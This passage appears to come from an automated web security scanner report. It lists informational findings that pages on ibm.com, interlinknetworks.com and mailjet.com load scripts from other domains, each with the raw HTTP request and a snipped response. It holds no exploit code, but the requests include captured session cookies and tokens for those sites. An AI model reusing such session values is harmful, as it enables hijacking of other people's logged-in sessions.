Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/search/csass/search?sn=mh&q=xss&lang=en&cc=us&en=utf
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.vm.ibm.com/overview/; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:55:06 GMT
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47 (Unix) DAV/2
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 81509

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<link href="//dw1.s81c.com/developerworks/css/dw-mf/dw-mf0311.css" rel="stylesheet" title="www" type="text/css"/>
<script src="//dw1.s81c.com/common/js/ibmcommon.js" type="text/javascript">//</script>
<script src="//dw1.s81c.com/common/js/dynamicnav.js" type="text/javascript">//</script>

<!-- dW functional JS -->
<script language="JavaScript" src="//dw1.s81c.com/developerworks/js/urltactic.js" type="text/javascript"></script>
<!-- Rating_START -->
<script language="JavaScript" src="//dw1.s81c.com/developerworks/js/artrating/showrating.js" type="text/javascript"></script>
...[SNIP]...
<!-- RESERVED_HEADER_INCLUDE -->
<script language="javascript" src="//dw1.s81c.com/developerworks/js/ajax1.js" type="text/javascript"></script>
<script language="javascript" src="//dw1.s81c.com/developerworks/js/search_counter-maverick.js" type="text/javascript"></script>
<script language="javascript" src="//dw1.s81c.com/developerworks/js/request_referer_capture-maverick.js" type="text/javascript"></script>
...[SNIP]...
<!-- JQuery start -->
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/jquery/cluetip98/jquery.hoverIntent.minified.js"></script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/jquery/cluetip98/jquery.cluetip.js"></script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/jquery/tagging/ui.core-1.7.1.js"></script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/jquery/tagging/ui.slider-1.7.1.js"></script>
<!-- xM Masthead/Footer -->
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/jquery.tools.min.js">//</script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/jquery.jscroll.js">//</script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/dw_v16.js">//</script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/flash-detect.js">//</script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/dwsi.js">//</script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/dwjquerytags.js"></script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/showcomments.js">//</script>
...[SNIP]...
<!-- Overlay js -->
<script language="JavaScript" src="//dw1.s81c.com/common/js/overlay.js" type="text/javascript"></script>
<!-- My dW Interest article -->
<script language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/showinterest.js" type="text/javascript">//</script>
...[SNIP]...
<div id="ibm-metrics">
<script src="//dw1.s81c.com/common/stats/stats.js" type="text/javascript">//</script>
...[SNIP]...

18.158. http://www.ibm.com/products/us/en/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /products/us/en/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products/us/en/ HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www-304.ibm.com/support/operations/us/en/invoicespayments?lnk=mhmy
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.ibm.com/developerworks/forums/thread.jspa%3FmessageID%3D14644760; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK; JSESSIONID=0000BHX9VBiw2pkdoj0QKb4kAfq:12too2opq; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:57:38 GMT
Server: IBM_HTTP_Server
Vary: User-Agent
Last-Modified: Fri, 09 Sep 2011 04:23:15 GMT
ETag: "360b-893852c0"
Accept-Ranges: bytes
ntCoent-Length: 13835
Content-Type: text/html
Vary: User-Agent, Accept-Encoding
Content-Length: 13835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<meta con
...[SNIP]...
<link href="//1.www.s81c.com/common/v17/css/www.css" rel="stylesheet" title="www" type="text/css" />
<script src="//1.www.s81c.com/common/js/dojo/www.js" type="text/javascript">//</script>
...[SNIP]...

18.159. http://www.ibm.com/search/csass/search/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /search/csass/search/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search/csass/search/?sn=dw&lang=en&cc=US&en=utf&hpp=20&dws=dw&q=xss&Search=Search HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/developerworks/tivoli/library/s-csscript/
Cookie: IBMCSACOOKIE=unknown-Qio3QRdmTmRds9wLjxSq85quQNDMBtIsFvFfdWFBh0E=--; ibmSurvey=1316220781236; pSite=http%3A//www.vm.ibm.com/overview/; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK; JSESSIONID=0000BvNLyPzxNajEfgFdmrEFjxa:12too2opq

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:55:34 GMT
Server: IBM_HTTP_Server
Vary: User-Agent
Set-Cookie: IBMCSACOOKIE=unknown-Qio3QRdmTmRds9wLjxSq85quQNDMBtIsFvFfdWFBh0E=--
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=3600, no-cache=set-cookie
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Vary: User-Agent, Accept-Encoding
Content-Length: 63016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<!-- properties.ftl--><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="
...[SNIP]...
<!-- metrics.ftl ends -->
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/jquery.tools.min.js">//</script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/jquery.jscroll.js">//</script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/dw_v16.js">//</script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/flash-detect.js">//</script>
<script type="text/javascript" language="JavaScript" src="//dw1.s81c.com/developerworks/js/dw-mf/dwsi.js">//</script>
...[SNIP]...

18.160. http://www.ibm.com/us/en/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /us/en/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/en/ HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.vm.ibm.com/overview/
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.vm.ibm.com/overview/; UnicaNIODID=oNxUBOiFZhX-XKsQQhu

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:53:45 GMT
Server: IBM_HTTP_Server
Vary: User-Agent,*
Cteonnt-Length: 12126
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent, Accept-Encoding
Content-Length: 12126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<meta con
...[SNIP]...
<link href="//1.www.s81c.com/common/v17/css/www.css" rel="stylesheet" title="www" type="text/css" />
<script src="//1.www.s81c.com/common/js/dojo/www.js" type="text/javascript">//</script>
...[SNIP]...

18.161. http://www.interlinknetworks.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.interlinknetworks.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.interlinknetworks.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/radius+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:44:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Accept-Ranges: bytes
Content-Length: 17628
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<title>Powerful AAA RADIUS Server Software</title>
<meta name="verify-v1" content="wR75ymBO+5R+Obb/KMtaybA68DxjSJJa4SREN5
...[SNIP]...
</p>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.162. http://www.interlinknetworks.com/applications.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.interlinknetworks.com
Path:   /applications.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /applications.htm HTTP/1.1
Host: www.interlinknetworks.com
Proxy-Connection: keep-alive
Referer: http://www.interlinknetworks.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=79926735.527484484.1316220326.1316220326.1316220326.1; __utmb=79926735; __utmc=79926735; __utmz=79926735.1316220326.1.1.utmccn=(referral)|utmcsr=blekko.com|utmcct=/ws/radius+server|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:44:49 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Accept-Ranges: bytes
Content-Length: 21957
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><!-- InstanceBegin template="/Templates/subpage.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="d
...[SNIP]...
</p>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.163. http://www.interlinknetworks.com/pricing.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.interlinknetworks.com
Path:   /pricing.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pricing.htm HTTP/1.1
Host: www.interlinknetworks.com
Proxy-Connection: keep-alive
Referer: http://www.interlinknetworks.com/rad.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=79926735.527484484.1316220326.1316220326.1316220326.1; __utmc=79926735; __utmz=79926735.1316220326.1.1.utmccn=(referral)|utmcsr=blekko.com|utmcct=/ws/radius+server|utmcmd=referral; __utmb=79926735

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:44:59 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Accept-Ranges: bytes
Content-Length: 11614
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><!-- InstanceBegin template="/Templates/subpage.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="d
...[SNIP]...
</p>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.164. http://www.interlinknetworks.com/products/on2-4-1radseries.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.interlinknetworks.com
Path:   /products/on2-4-1radseries.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products/on2-4-1radseries.htm HTTP/1.1
Host: www.interlinknetworks.com
Proxy-Connection: keep-alive
Referer: http://www.interlinknetworks.com/pricing.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=79926735.527484484.1316220326.1316220326.1316220326.1; __utmc=79926735; __utmz=79926735.1316220326.1.1.utmccn=(referral)|utmcsr=blekko.com|utmcct=/ws/radius+server|utmcmd=referral; __utmb=79926735

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:45:06 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43241

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><!-- InstanceBegin template="/Templates/subpage.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="d
...[SNIP]...
</p>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.165. http://www.interlinknetworks.com/rad.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.interlinknetworks.com
Path:   /rad.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /rad.htm HTTP/1.1
Host: www.interlinknetworks.com
Proxy-Connection: keep-alive
Referer: http://www.interlinknetworks.com/services.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=79926735.527484484.1316220326.1316220326.1316220326.1; __utmc=79926735; __utmz=79926735.1316220326.1.1.utmccn=(referral)|utmcsr=blekko.com|utmcct=/ws/radius+server|utmcmd=referral; __utmb=79926735

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:44:55 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Accept-Ranges: bytes
Content-Length: 25601
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><!-- InstanceBegin template="/Templates/subpage.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="d
...[SNIP]...
</p>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.166. http://www.interlinknetworks.com/services.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.interlinknetworks.com
Path:   /services.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /services.htm HTTP/1.1
Host: www.interlinknetworks.com
Proxy-Connection: keep-alive
Referer: http://www.interlinknetworks.com/applications.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=79926735.527484484.1316220326.1316220326.1316220326.1; __utmc=79926735; __utmz=79926735.1316220326.1.1.utmccn=(referral)|utmcsr=blekko.com|utmcct=/ws/radius+server|utmcmd=referral; __utmb=79926735

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:44:51 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Accept-Ranges: bytes
Content-Length: 20883
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><!-- InstanceBegin template="/Templates/subpage.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="d
...[SNIP]...
</p>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.167. http://www.mailjet.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mailjet.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.mailjet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=US-EN-smtp; __utma=176514170.637056612.1316204845.1316204845.1316216714.2; __utmz=176514170.1316216714.2.2.utmgclid=CKqV0feJoqsCFQdzgwod6j2wjw|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server; mail_session=eBECc5P86kNJkdgPHXMP5I1eoqmuQK8Wth9SeN6SpTanNl%2BIMK3Vk3hh%2BKotjc6kCTPrDJoNurwRw6GM%2BTajfd68Q2JR1srviTEIJQdZlQKcAP%2FgpKerTQyg069KhGc%2BKH8Lqz7CvTFUOuDyUHLQaw3dO5sbOebp%2FdlS43mL0ixewGdzbbUf70Lthq8bT89vu1yA1IJJEHuJkgsvifrOiWlu0lqtQ1mxNLsnfDBqQUeWErQHGUIhtFZ4I6kszTHJVi9nKTtO%2BHEMndjaNyaeH5gOYLil%2FjP3614KUDFePqmcCo8AdA18wCf62qAqYrXYXou1GUUNCQ7Gu6p%2Bgj4NBZTyMiTWqj5vRjYS3u6FfuvOVot%2Frn4DCjf8eGKoOh9Wi%2FdKLTsMqkwMo7mOdNVUqZp96fwCysDLdMJd3jRKoJWcol9ssDrA8rxzNM1IiLEgBkghrkbu3Oe0HKA%2BiG6nvUHaAan6eTFbImXerdkZN6ERU8oyWiTyQh13H7cVFjBnnsG%2Fl%2BZ%2BxWFO5lhxSzjq9Re5pfoI5qbGq23okGTmc1tR0P%2FM09Uax2UAE6RZPDKyHK8Rb0qbhJXKkuqzQE7FfJcUEUIP%2Fvn2mGbPLoBoY5hAOZ1hkdAfeEWnK2F16247

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 21:54:37 GMT
Server: MJWS/1.0
Set-Cookie: mail_session=E7akOnzn%2FBA1l6z%2FaW%2BN1GdC75rQgbL5GSBkgpGxDQxWUXGAjBsnQl2ghC1weFjH97%2FX958Q8xLgMFEPkxx1TUmqwLlxTE52ADvd%2B4K7geFiEoVb1BRSEVx%2FEIdhtPbtqBiAF915vU5lG0o71aUPLVeOkZ0oga%2BQkGE%2BD6xqTJWX9ewXAop2Li%2FUKffRZZEsVmmduR0H0o7STsiY1r5ju8KSYlXV2pSpORxb1nMMduo0w6xfcmI9wXG8Dos%2FVBaFZgmae4BU1Q%2FMFK4il10d7cXGQdLR9bf2gzksL8BoehEaX2hQcFxCXS6i7TSPRwaB7VwqLhcdr6Jq2rtdBxIQEZ4xaZyGmZCMPvCmmZMpjc1uIFX0OPKISRYjNbDyvCGmf0Kp6R5R%2BlYF9U2zc64dZQXsHzDvz3vwHMTx%2BayPNzK5cwY81Mwc%2B0NP%2Bp57ZgC1aNaNdrA7V5hZSPVjWHAuDUY2K4yzLjHDw7hdhpSu3CutQIPGspzdQKm5jJySQnW50UzW5g%2FKWaEYlgQ4fXPZ%2BGll5shnlRV9dN9uOE8Szqht%2BQSqRkJ6W5fdFvxTVihLl6r1DNLD0RSTIFxcshasi6rvTWhrwZR159CrB11QuZFMwLwlUqJwPZAN%2FcRULvZ8; expires=Fri, 23-Sep-2011 21:54:37 GMT; path=/; domain=.mailjet.com
Content-Type: text/html; charset=utf-8
Content-Length: 12292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>Mailjet : Real-time Emailing
...[SNIP]...
<!-- ++++++ JAVASCRIPTS +++++ -->

<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script src="https://livechat.iadvize.com/chat_button.js?sid=1821&amp;onimg=http://www.mailjet.com/images/theme/v1/bg/blank.gif&amp;offimg=http://www.mailjet.com/images/theme/v1/bg/blank.gif" type="text/javascript"></script>
...[SNIP]...

18.168. http://www.mailjet.com/features  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mailjet.com
Path:   /features

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /features HTTP/1.1
Host: www.mailjet.com
Proxy-Connection: keep-alive
Referer: http://www.mailjet.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=US-EN-smtp; mail_session=170C5t%2BzRJJ5t%2FWv1ULaD7bK8ItpVy7iytSGyaHePyLTX3sJaU19v5y8r3EqdHTwSZqUba4mEDAu6RDO9Yume6Q36MZp83YIr9SG%2FlelT9kxkMl79h2fHQh0O99uPuUyb0tsP0Am4hqjnlwkjdwf3bKJEh5B4ef6HZGtsFVnueph1WcP2gdunPQaT9H2VRZjw2pSGuUM6ZZDJhb1sxZ5OXehfHhdgKf66xZbmq4SMsKU%2FAtkCbqGWzWB852Yjqf4WEj%2BRsv69x9nkcCHxWvHd1TVykmWxj2ueoG6%2F8GzE45ZTkb8dsc9YMpK5gpeXkmX6S02L0Ej7oGv847c92MA54RQPQDrWdNNKWh0o0dYCYrNIh56EJz8ptb%2F0P4py9guha4Joj1q%2F05fAK4M1gcl3VB8FHX1awSWpfQfK7JrK5%2FA0qyaJ0ss4jP3CQaDDo%2BFSKPSdP4Qa05YuQh2Wz%2BA6O4Gcqc2kFssi3b8JHpsBkWyN0pVa3MtlhaDtzLZQIUrsUYXs6zSxXwoPEbQ7UlMzMvBZJTAR39lBjutvOvY810HOw98wbRhbDR%2BqD8FSjECOcFI3dwqrLkbnurRGcgvV5DQWTaP9PiIbUAdzzNx1Tg5yjruOvau6y4p7H5u9Zj7; __utma=176514170.637056612.1316204845.1316216714.1316228159.3; __utmb=176514170.1.10.1316228159; __utmc=176514170; __utmz=176514170.1316228159.3.3.utmgclid=CKqV0feJoqsCFQdzgwod6j2wjw|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 21:54:49 GMT
Server: MJWS/1.0
Content-Type: text/html; charset=utf-8
Content-Length: 15063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>Our Awesome features - mailje
...[SNIP]...
<!-- ++++++ JAVASCRIPTS +++++ -->

<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script src="https://livechat.iadvize.com/chat_button.js?sid=1821&amp;onimg=http://www.mailjet.com/images/theme/v1/bg/blank.gif&amp;offimg=http://www.mailjet.com/images/theme/v1/bg/blank.gif" type="text/javascript"></script>
...[SNIP]...

18.169. http://www.mailjet.com/pricing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mailjet.com
Path:   /pricing

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pricing HTTP/1.1
Host: www.mailjet.com
Proxy-Connection: keep-alive
Referer: http://www.mailjet.com/features
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=US-EN-smtp; mail_session=170C5t%2BzRJJ5t%2FWv1ULaD7bK8ItpVy7iytSGyaHePyLTX3sJaU19v5y8r3EqdHTwSZqUba4mEDAu6RDO9Yume6Q36MZp83YIr9SG%2FlelT9kxkMl79h2fHQh0O99uPuUyb0tsP0Am4hqjnlwkjdwf3bKJEh5B4ef6HZGtsFVnueph1WcP2gdunPQaT9H2VRZjw2pSGuUM6ZZDJhb1sxZ5OXehfHhdgKf66xZbmq4SMsKU%2FAtkCbqGWzWB852Yjqf4WEj%2BRsv69x9nkcCHxWvHd1TVykmWxj2ueoG6%2F8GzE45ZTkb8dsc9YMpK5gpeXkmX6S02L0Ej7oGv847c92MA54RQPQDrWdNNKWh0o0dYCYrNIh56EJz8ptb%2F0P4py9guha4Joj1q%2F05fAK4M1gcl3VB8FHX1awSWpfQfK7JrK5%2FA0qyaJ0ss4jP3CQaDDo%2BFSKPSdP4Qa05YuQh2Wz%2BA6O4Gcqc2kFssi3b8JHpsBkWyN0pVa3MtlhaDtzLZQIUrsUYXs6zSxXwoPEbQ7UlMzMvBZJTAR39lBjutvOvY810HOw98wbRhbDR%2BqD8FSjECOcFI3dwqrLkbnurRGcgvV5DQWTaP9PiIbUAdzzNx1Tg5yjruOvau6y4p7H5u9Zj7; __utma=176514170.637056612.1316204845.1316216714.1316228159.3; __utmb=176514170.2.10.1316228159; __utmc=176514170; __utmz=176514170.1316228159.3.3.utmgclid=CKqV0feJoqsCFQdzgwod6j2wjw|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 21:54:53 GMT
Server: MJWS/1.0
